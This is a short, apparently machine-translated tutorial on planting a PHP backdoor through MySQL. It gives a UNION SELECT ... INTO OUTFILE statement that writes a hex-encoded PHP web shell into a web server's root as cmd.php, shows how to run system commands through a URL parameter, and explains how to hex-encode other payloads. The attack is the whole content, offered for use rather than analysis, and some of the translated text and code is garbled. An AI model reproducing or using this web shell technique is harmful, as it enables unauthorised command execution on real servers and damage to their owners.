The way to generate backdoor Trojans via MySQL statements:
The following are the referenced contents:
SELECT * from ' vbb_strikes ' WHERE 1 Union Select 2,3,0x3c3f7068702073797374656d28245f52455155455 3545b636d645d293b3f3e From Vbb_strikes into outfile ' c:/inetpub/wwwroot/cmd.php ' |
Through the injection of MySQL or running the above statement in the phpMyAdmin, the c:/inetpub/wwwroot/cmd.php file will be generated, the content is the original vbb_strikes content, followed by:
2 3 <?php System ($_request[cmd]);? >
And then through Http://www.xxx.com/cmd.php?cmd=dir c:\ You can execute the System DOS command!
Q: What is that string of 0x3c3f7068702073797374656d28245f524551554553545b636d645d293b3f3e?
A: This is the hexadecimal encoding in the following code,
<?php system ($_request[cmd]);? >
If you do not use this method, there will be different versions of the SQL version of the code: such as%XX, which this backdoor can not be implemented! If you have other names to make, you can enter into the UltraEdit, and then press [CTRL+H] key, the inside of the hexadecimal link together on it!